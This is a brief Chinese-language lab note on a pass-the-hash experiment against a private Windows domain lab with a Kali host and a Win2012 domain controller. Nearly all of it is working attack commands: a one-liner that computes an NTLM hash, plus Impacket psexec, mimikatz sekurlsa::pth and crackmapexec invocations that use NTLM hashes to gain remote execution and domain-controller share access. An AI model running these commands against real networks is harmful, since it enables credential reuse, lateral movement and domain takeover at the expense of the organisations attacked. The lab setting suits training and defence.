PTH 实验

1. 实验网络拓扑

kali: 
192.168.72.128

win2008:
192.168.135.129
192.168.72.139

win7:
192.168.72.149

win2012:(DC)
192.168.72.131	

2. EXPLOIT

0x0. NTLM hash计算脚本

python3 -c 'import hashlib,binascii; print (binascii.hexlify(hashlib.new("md4", "123qweQWE".encode("utf-16le")).digest()))'

0x1. psexec.py

Impacket\example\psexec.py

python3 psexec.py win2008@192.168.72.139 -hashes 0:8320b7c94e8dcbbb34a9e5f9443cb569

0x2. mimikatz

用sekurlsa::pth模块：

mimikatz.exe "privilege::debug" "sekurlsa::pth /user:administrator /domain:intranet.com /ntlm:d92f28ef1db7d97706a7bb3983632cf7" "exit"

验证：

dir \\dc.intranet.com\c$

0x3. crackmapexec

crackmapexec smb 192.168.72.131 -u administrator -H d92f28ef1db7d97706a7bb3983632cf7 -d intranet.com -x "whoami"

0x4. MSF

exploit/windows/smb/psexec

试了好多次，都报错。。。

0x05. CS

CobaltStrike图形化就太简单了。。。不写了。。